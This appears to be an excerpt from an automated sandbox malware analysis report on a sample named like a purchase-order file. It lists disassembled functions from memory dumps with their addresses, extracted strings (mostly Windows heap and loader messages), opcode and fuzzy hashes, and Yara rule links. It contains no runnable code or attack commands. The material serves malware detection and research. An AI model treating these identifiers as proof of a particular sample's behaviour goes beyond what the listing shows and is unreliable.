String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: 9bc577c83c9e42230424cf02ac0ae3341d5387ac64fddce4b5393d6cd2a69c49
Instruction ID: 8bba36e307b86106e85fefab023b955c5871dc529fd83230ff0350a37edd0f5d
Opcode Fuzzy Hash: 9bc577c83c9e42230424cf02ac0ae3341d5387ac64fddce4b5393d6cd2a69c49
Instruction Fuzzy Hash: 54E1E2306046469FEB6ACF68C8517BEBBE5EF48304F18889DE9D68B286D734D940CB50

Function 01026882 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON

Download Yara Rule

Strings

, xrefs: 0106C85B
@, xrefs: 01026B44

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID: InitializeThunk
String ID: $@
API String ID: 2994545307-1077428164
Opcode ID: 26948596d2b7f45b9357bbcb20a9c8020dfb3fe21feb0f037b26054e752e053f
Instruction ID: faf58f925dbe6569fcb2309d99fc0dd48cdaa7678f057291b5b5bbf4aa5fa309
Opcode Fuzzy Hash: 26948596d2b7f45b9357bbcb20a9c8020dfb3fe21feb0f037b26054e752e053f
Instruction Fuzzy Hash: A8C29D71A083519FE765CF28C880BABBBE5BF98704F04896DFAC987241D775D844CB92

Function 00C228C0 Relevance: 4.0, Strings: 3, Instructions: 239COMMON

Download Yara Rule

Strings

gfff, xrefs: 00C229A1
gfff, xrefs: 00C22960
VUUU, xrefs: 00C22A49

Memory Dump Source

Source File: 00000000.00000002.22425930183.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.22425875607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.22426016644.0000000000C67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_PO_62401394_MITech_20250601.jbxd

Yara matches

Similarity

API ID:
String ID: VUUU$gfff$gfff
API String ID: 0-2692852535
Opcode ID: e728554bcdf143e649879a8a1b93aa9594527ddf45fbd6c72b4fc290a8dadf9c
Instruction ID: 102509d71faaf5d9bc80e58c8e26858ea3ed541d144b47fc3f03ccdc67160f8e
Opcode Fuzzy Hash: e728554bcdf143e649879a8a1b93aa9594527ddf45fbd6c72b4fc290a8dadf9c
Instruction Fuzzy Hash: 85613772B001296BDB28C85DFC817B9B755E7D0325F18413AED59CFE81E921AF4592D0

Function 00FFA147 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

UseFilter, xrefs: 00FFA171
\??\, xrefs: 0105BF73
FilterFullPath, xrefs: 0105C075

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: fa4a652956b0ba782186dcb2e47a7b78ff8c1de5d17a90831c70824ad06a96de
Instruction ID: 53ad9d4afa58bf59f0b5ee80c8862608185127161ccf9c24cf3d211b12a2b921
Opcode Fuzzy Hash: fa4a652956b0ba782186dcb2e47a7b78ff8c1de5d17a90831c70824ad06a96de
Instruction Fuzzy Hash: FDA18F719016299BDB71DF28CC88BEAB7B8EF05714F1005EAEA4CA7250E7359E85CF50

Function 0101096B Relevance: 3.9, Strings: 3, Instructions: 190COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 0106514F
((PHEAP_ENTRY)LastKnownEntry <= Entry), xrefs: 0106515A
HEAP[%wZ]: , xrefs: 01065142

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
API String ID: 0-1334570610
Opcode ID: fff0c8604e309ebbc3d2b4228fa7046dc70dfadc2b3f0334dcd4913b70b3435c
Instruction ID: 989d6d69b3ed606b6a255a8a232d31dc55cf99b022267ae8339a5f5314940fb4
Opcode Fuzzy Hash: fff0c8604e309ebbc3d2b4228fa7046dc70dfadc2b3f0334dcd4913b70b3435c
Instruction Fuzzy Hash: D961BE71600305DFEB29CF28C851BAABBE5FF44700F14859AE5C58F29AD775E881CB91

Function 00C228BC Relevance: 3.9, Strings: 3, Instructions: 170COMMON

Download Yara Rule

Strings

gfff, xrefs: 00C229A1
gfff, xrefs: 00C22960
VUUU, xrefs: 00C22A49

Memory Dump Source

Source File: 00000000.00000002.22425930183.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.22425875607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.22426016644.0000000000C67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_PO_62401394_MITech_20250601.jbxd

Yara matches

Similarity

API ID:
String ID: VUUU$gfff$gfff
API String ID: 0-2692852535
Opcode ID: c92d5e4277d9aa26ccdbf0a1504f98fc36ac3d20622c6cb4430dd26f47099416
Instruction ID: 4ede79b473882d1e20d67700ee92a973ca55c76896c8ef957d267017991270ab
Opcode Fuzzy Hash: c92d5e4277d9aa26ccdbf0a1504f98fc36ac3d20622c6cb4430dd26f47099416
Instruction Fuzzy Hash: B9415472A001396BDB2C895DECC07A9B666E7E4314F18823AED55CFBD1E920AF4497C1

Function 00FFCC68 Relevance: 3.9, Strings: 3, Instructions: 164COMMON

Download Yara Rule

Strings

\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 00FFCCD4
InstallLanguageFallback, xrefs: 00FFCD1F
@, xrefs: 00FFCD03

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: 1c461967dd99104f7fb67d13f324fc519023c011147c93717d98da2f9aa8f1ce
Instruction ID: 78a4ea05cda59c803424d6f52cce6908206daa7d0d41aace262ec2c8ddc66b74
Opcode Fuzzy Hash: 1c461967dd99104f7fb67d13f324fc519023c011147c93717d98da2f9aa8f1ce
Instruction Fuzzy Hash: 5551B17660431A9BC750DF68C890BBFB7E8AF88754F040A6EFE85D7250E734D90487A6

Function 010AD62C Relevance: 3.9, Strings: 3, Instructions: 163COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 010AD79F
HEAP[%wZ]: , xrefs: 010AD792
Heap block at %p modified at %p past requested size of %Ix, xrefs: 010AD7B2

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
API String ID: 0-3815128232
Opcode ID: ffc7cc7654cf497edafcd9e54d4f8eb3e69c9f44306e6e0f5ee828ba3e268d98
Instruction ID: 37255ac1449f7f78f2d442ab4f888c5b4104269708fa48f628f02af4e77bd400
Opcode Fuzzy Hash: ffc7cc7654cf497edafcd9e54d4f8eb3e69c9f44306e6e0f5ee828ba3e268d98
Instruction Fuzzy Hash: 22514C341002908EE3B8CEEDC84577A7BE1EF49344F94488EE5C68BD95E736D442EB20

Function 01010ACE Relevance: 3.8, Strings: 3, Instructions: 70COMMON

Download Yara Rule

Strings

(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size), xrefs: 01065256
HEAP: , xrefs: 0106524B
HEAP[%wZ]: , xrefs: 0106523E

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-2558761708
Opcode ID: 72383133c36eeee283a135eba5e85f743067c333f0444eaaec48feb7b65861ba
Instruction ID: bdaab99ab15de89e4008b8ffbfb7c880d134c89366b7636fc255a9df81c1588c
Opcode Fuzzy Hash: 72383133c36eeee283a135eba5e85f743067c333f0444eaaec48feb7b65861ba
Instruction Fuzzy Hash: 8B1126313015029FDB69DB18CC94B7AB3A9FF41710F18816AF5C6CB299DB38D880C741

Function 010A6BDE Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 112timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 010A6C42

Strings

kLsE, xrefs: 010A6C24

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID: DebugPrintTimes
String ID: kLsE
API String ID: 3446177414-3058123920
Opcode ID: c37e1c8ba7c0d3aef29c83658cea66bafc27b5349d12dd6015d3fac274048884
Instruction ID: ce3ecbd69b3bba72bb809e623bd38402e426e62faf7eb1b7c2698b2598958f7b
Opcode Fuzzy Hash: c37e1c8ba7c0d3aef29c83658cea66bafc27b5349d12dd6015d3fac274048884
Instruction Fuzzy Hash: 7B41563190134686E731FBA8E88A7A93BE4FB40B64F58015DEDD08A5C9CB7B48C5C790

Function 0109AA40 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 89timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 0109AB34

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0109AABF

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID: DebugPrintTimes
String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 3446177414-1911121157
Opcode ID: d441788c11602d3cea1143891695febfc3df286f5c8990a454bad29e160d7d92
Instruction ID: 4a6daf2bfdef007a0e2314f9c74a6060b537700844a357ba39409e840cd3bc17
Opcode Fuzzy Hash: d441788c11602d3cea1143891695febfc3df286f5c8990a454bad29e160d7d92
Instruction Fuzzy Hash: 853138B2B00644EFDB11DF58CD45F9ABBF5FB44B10F108569F945A7A85C739A800CB90

Function 010885AA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON

Download Yara Rule

Strings

AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 010885DE

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
API String ID: 0-702105204
Opcode ID: b55eee7c949c10fb8ced5fee1ceedae0256aeb928ed307468a57a3d58599fd0d
Instruction ID: 3d6de7bba9f20784102d06d59a9ec3f40d708b6c16037e5194c9dcb469c39eed
Opcode Fuzzy Hash: b55eee7c949c10fb8ced5fee1ceedae0256aeb928ed307468a57a3d58599fd0d
Instruction Fuzzy Hash: A6017B352082015BE7B17F55DC45A6A3FA5FF49318F84016EF7C117897CB21A850CB94

Function 010151C0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON

Download Yara Rule

Strings

@, xrefs: 010154C3
@, xrefs: 01015365

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: @$@
API String ID: 0-149943524
Opcode ID: 700cc611352eac05d30c5439c43a376069db7f2d050793527dcb25e209137378
Instruction ID: e24e82f61de49c5bdb16ef4d9631402889c27c2c94b59672ea97c51e5fd554f9
Opcode Fuzzy Hash: 700cc611352eac05d30c5439c43a376069db7f2d050793527dcb25e209137378
Instruction Fuzzy Hash: CE32AB705083118BD7648F18C890B7EBBE5EFCA704F14496EFAD59B294E739D980CB92

Function 0100A8F0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON

Download Yara Rule

Strings

LdrResSearchResource Enter, xrefs: 0100A933
LdrResSearchResource Exit, xrefs: 0100A945

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
API String ID: 0-4066393604
Opcode ID: a2042d929b944762b8c821bb4eb0201f8d8b4f94b03888379e18cb942f694236
Instruction ID: 5c160268fb598a2ed99592aba1f736ca858efa0c2b2556ba40d691df8fa45008
Opcode Fuzzy Hash: a2042d929b944762b8c821bb4eb0201f8d8b4f94b03888379e18cb942f694236
Instruction Fuzzy Hash: A7E17C71F00349DBFF22DA99C980BEEBBB9BF55310F14446AE981EB2D1D73499808B50

Function 010A2AE0 Relevance: 2.8, Strings: 2, Instructions: 327COMMON

Download Yara Rule

Strings

*** ASSERT FAILED: Input parameter pwmszLanguage for function RtlGetUILanguageInfo is not a valid multi-string!, xrefs: 010A2B91
, xrefs: 010A2E38

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: $*** ASSERT FAILED: Input parameter pwmszLanguage for function RtlGetUILanguageInfo is not a valid multi-string!
API String ID: 0-4088147954
Opcode ID: 9c4309ff8cfa5b297a2b3d649756383a6263c657d2a9b44cdd06840057526deb
Instruction ID: 4366eae174425269176fa1ca8d95c5f716d05aaafbf6b45e583a543e636f2506
Opcode Fuzzy Hash: 9c4309ff8cfa5b297a2b3d649756383a6263c657d2a9b44cdd06840057526deb
Instruction Fuzzy Hash: FBC1EE716083059FE721DF98C480B6BBBE5AF98314F84897DFAC49B241E774D981CB92

Function 01000C12 Relevance: 2.8, Strings: 2, Instructions: 317COMMON

Download Yara Rule

Strings

Failed to retrieve service checksum., xrefs: 0105EC5D
ResIdCount less than 2., xrefs: 0105ECD0

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: Failed to retrieve service checksum.$ResIdCount less than 2.
API String ID: 0-863616075
Opcode ID: 6de14865b2612680d8fce50447805df7c450df813909b75eed90adf7f8dd1cfb
Instruction ID: 083593fab5b398fced4e619a1f143644e31a20f35697eb8b699961658350962c
Opcode Fuzzy Hash: 6de14865b2612680d8fce50447805df7c450df813909b75eed90adf7f8dd1cfb
Instruction Fuzzy Hash: E1E1F2B19087849FE365CF15C481BABBBE4FB88714F00892EE5D98B381DB718509CF96

Function 0107E372 Relevance: 2.7, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

UEFI, xrefs: 0107E3D1
Legacy, xrefs: 0107E3DA

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 9f13f2206519ea45f1ca367e807cf8aa47a57cbb47529050c1687fd33fc096b1
Instruction ID: 31e103c2a889f6defcbbc871a7badd6286c7d60ada95ae09e4352141a2c7ee61
Opcode Fuzzy Hash: 9f13f2206519ea45f1ca367e807cf8aa47a57cbb47529050c1687fd33fc096b1
Instruction Fuzzy Hash: FE615DB1E012199FDB25DFA8C840BADBBF9FB44700F1440ADE689EB251E731E940CB54

Function 0100AB70 Relevance: 2.7, Strings: 2, Instructions: 178COMMON

Download Yara Rule

Strings

LdrpResGetMappingSize Exit, xrefs: 0100AB9C
LdrpResGetMappingSize Enter, xrefs: 0100AB8A

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: LdrpResGetMappingSize Enter$LdrpResGetMappingSize Exit
API String ID: 0-1497657909
Opcode ID: 13475b4960d46fec63dc916727e75ed8565ea5ff3c9b72e9bb45998eb5ab163d
Instruction ID: a555b9e613ae77910007f6cb2542ca8e41fe134fdb0cb522b5dbe22b9be135a7
Opcode Fuzzy Hash: 13475b4960d46fec63dc916727e75ed8565ea5ff3c9b72e9bb45998eb5ab163d
Instruction Fuzzy Hash: DF61AE71B04749CFFB52CF68C850BAEBBF9BF54750F0504A9E981AB281D7759940C760

Function 01032DBC Relevance: 2.6, Strings: 2, Instructions: 130COMMON

Download Yara Rule

Strings

RtlpInsertAssemblyStorageMapEntry, xrefs: 01072611
SXS: %s() bad parametersSXS: Map : %pSXS: AssemblyRosterIndex : 0x%lxSXS: Map->AssemblyCount : 0x%lxSXS: StorageLocation : %pSXS: StorageLocation->Length: 0x%xSXS: StorageLocation->Buffer: %pSXS: OpenDirectoryHand, xrefs: 01072616

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: RtlpInsertAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: AssemblyRosterIndex : 0x%lxSXS: Map->AssemblyCount : 0x%lxSXS: StorageLocation : %pSXS: StorageLocation->Length: 0x%xSXS: StorageLocation->Buffer: %pSXS: OpenDirectoryHand
API String ID: 0-2104531740
Opcode ID: 8fd057bd3ac0f01c1b526c6569d285f67273c8905a3e840d50f2e9ce78df4c19
Instruction ID: 9f2d27ed9c9440ad6109a267ce01d5e7080b73549e2d349762fdc550b9f585dc
Opcode Fuzzy Hash: 8fd057bd3ac0f01c1b526c6569d285f67273c8905a3e840d50f2e9ce78df4c19
Instruction Fuzzy Hash: 3841C672A00211EBD725DF59C891E7AF7B5FF94710F15806EEA859B240E730DD41C7A4

Function 0100A1E3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

RtlpResUltimateFallbackInfo Enter, xrefs: 0100A21B
RtlpResUltimateFallbackInfo Exit, xrefs: 0100A229

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-2876891731
Opcode ID: 3177a3869ed758d7378039f0c5efeac6ef1f97019f7829c1ccbd74dce13dcf61
Instruction ID: f328ba265b18bb72817152b99da7e6584f2f6977c72e24303552ef24131e022b
Opcode Fuzzy Hash: 3177a3869ed758d7378039f0c5efeac6ef1f97019f7829c1ccbd74dce13dcf61
Instruction Fuzzy Hash: 3741AB30B00755DBEB12DF6DC450B6DBBF8AF85750F1440A5E980DB2A1E63ADA40CB21

Function 00EBE2F5 Relevance: 2.6, Strings: 2, Instructions: 117COMMON

Download Yara Rule

Strings

=T, xrefs: 00EBE351
*+, xrefs: 00EBE341

Memory Dump Source

Source File: 00000000.00000002.22426113758.0000000000EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: *+$=T
API String ID: 0-63626216
Opcode ID: aae6eeec73a6b65fe3b5770042243ebd16212ca4bc3ff42cd369a2e63abc9795
Instruction ID: a3be27ac89f1a5258dbe850ca0b2075bd5e4ca1f9bc3fd56514078735902d762
Opcode Fuzzy Hash: aae6eeec73a6b65fe3b5770042243ebd16212ca4bc3ff42cd369a2e63abc9795
Instruction Fuzzy Hash: 2F318D71B201454BE70CCE2DD8913A637D6E785309B64E17CDE97CB38AEA38D813DA85

Function 0103A4F0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

Cleanup Group, xrefs: 0103A504
Threadpool!, xrefs: 0103A509

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID: InitializeThunk
String ID: Cleanup Group$Threadpool!
API String ID: 2994545307-4008356553
Opcode ID: b9ff01f3114c5d92b32e27e28beebcdc1138f6059ddaac690cda0b80c7e6807c
Instruction ID: 9c9043f61bd984a4c3bce34bbee096a9952fa6a14d53ea2cb5aedf0fecae7698
Opcode Fuzzy Hash: b9ff01f3114c5d92b32e27e28beebcdc1138f6059ddaac690cda0b80c7e6807c
Instruction Fuzzy Hash: 2E01D1B2250700EFD311DF14CD06B2677E8E784B15F048939A6D8C75E0E739D900CB46

Function 0100C6E0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON

Download Yara Rule

Strings

MUI, xrefs: 0100C7E3, 0100C960

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: MUI
API String ID: 0-1339004836
Opcode ID: cdc6387fdad2daca2b67fa8eb1729d71cb87a48d2d00ecfa6bb9e1d196f7a759
Instruction ID: e265118b3fa741a75ab4e577366320b82bc1a1175d05295811fa0fd755c2fbcf
Opcode Fuzzy Hash: cdc6387fdad2daca2b67fa8eb1729d71cb87a48d2d00ecfa6bb9e1d196f7a759
Instruction Fuzzy Hash: 96825F75E002199FFB66CFA9C9807EDBBB1FF44310F1481A9E999AB291D7309D81CB50

Function 01052E48 Relevance: 2.0, Strings: 1, Instructions: 762COMMON

Download Yara Rule

Strings

@`vBbv, xrefs: 01052F2D, 01053304, 0105335B, 0105341E, 0105344E

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: @`vBbv
API String ID: 0-2171403141
Opcode ID: 8b0c20dc857560e26fd9dce936543cad661ab00bd548de843501467c0878fcce
Instruction ID: 7520d724deba8cbf6060d926347c23e78ded4b3905c62d39b6dac52da3c4eabb
Opcode Fuzzy Hash: 8b0c20dc857560e26fd9dce936543cad661ab00bd548de843501467c0878fcce
Instruction Fuzzy Hash: CE42D671D04249AADFA9DBACD4546BFBFF1BF04394F14809AEDC1AF281D6348A80CB54

Function 010064F0 Relevance: 1.9, APIs: 1, Instructions: 383COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a87206f81978465e9213064e741ec60fc62ac852acc31684b1dbd0890fd627
Instruction ID: d78e4c3d8f02677835b7c2d461a3339aa18da403dda366c4f483cc5285c1ace2
Opcode Fuzzy Hash: c3a87206f81978465e9213064e741ec60fc62ac852acc31684b1dbd0890fd627
